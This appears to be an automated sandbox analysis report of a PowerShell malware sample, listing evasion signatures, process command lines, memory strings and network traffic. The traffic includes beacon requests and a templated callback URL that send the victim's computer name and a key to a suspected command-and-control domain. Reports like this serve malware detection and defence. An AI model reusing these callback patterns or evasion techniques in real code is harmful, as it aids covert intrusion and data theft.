
Windows Analysis Report
download.ps1

Overview

General Information

Sample name: download.ps1
Analysis ID: 1579870
MD5: 6dc27c0ae6c260bbed7a9b00e3306263
SHA1: 66d59a64b88b605d7fe887b4bcf7c9ea298fbb57
SHA256: fca7d47c39e4e5b1e375ff7497d67cfbd2bb4d2fa937c617f5a6b5c3c71ccb21
Tags: KongTukeps1user-monitorsg

Detection

Score: 60
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 6624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 6644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6624, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 6624, ProcessName: powershell.exe
No Suricata rule has matched


AV Detection

Source: Submitted Sample; Integrated Neural Analysis Model: Matched 88.9% probability
Source: Binary string: mscorlib.pdbCLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.1826242579.000001E2F6C22000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1828378406.000001E2F8CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbSq$$u source: powershell.exe, 00000000.00000002.1831734156.000001E2F907F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb} source: powershell.exe, 00000000.00000002.1832085428.000001E2F90F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tomation.pdbue source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 31bf3856ad364e35corlib.pdb source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000000.00000002.1832557825.000001E2F9338000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbM# source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbG source: powershell.exe, 00000000.00000002.1832085428.000001E2F90F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1832557825.000001E2F9338000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1832085428.000001E2F90F3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1826242579.000001E2F6C22000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1828378406.000001E2F8CE0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdbh{ source: powershell.exe, 00000000.00000002.1826242579.000001E2F6C22000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; HTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox View; IP Address: 45.61.136.138
Source: global traffic; HTTP traffic detected: GET /aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gajaechkfhfghal.top Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; HTTP traffic detected: GET /aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gajaechkfhfghal.top Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global traffic; DNS traffic detected: DNS query: gajaechkfhfghal.top
Source: global traffic; DNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://$ckda40xjnqlemz6/$jqly5pcaxf6vo3g.php?id=$env:computername&key=$dhvyekza&s=527
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.1829931432.000001E2F8F71000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.m
Source: powershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E2814B5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://gajaechkfhfghal.top
Source: powershell.exe, 00000000.00000002.1792974672.000001E2814B5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://gajaechkfhfghal.top/aoe6m40s3hhtr.php?id=user-PC&key=85684789732&s=527
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E281795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E2824B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282670000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28263C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282326000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282649000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28265D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28266A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282656000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28232D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282320000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282313000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282650000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E282347000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.1792974672.000001E280001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.1792974672.000001E280001000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E281795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.1792974672.000001E280228000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E281795000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E290001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.1819810872.000001E29006F000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.1792974672.000001E281863000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-202
Source: powershell.exe, 00000000.00000002.1792974672.000001E282347000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gif
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/logos/doodles/2024/seasonal-holidays-2024-6753651837110333-2xa.gifX
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFD9BAE7AE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFD9BAE8891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 0_2_00007FFD9BBA6989
Source: powershell.exe, 00000000.00000002.1792974672.000001E2817AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1792974672.000001E28173F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){var 
u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfgX
Source: powershell.exe, 00000000.00000002.1792974672.000001E281E7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.1792974672.000001E28194A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.1792974672.000001E28175B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="epDluNOoLrVXEHvCsvkULQ">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script 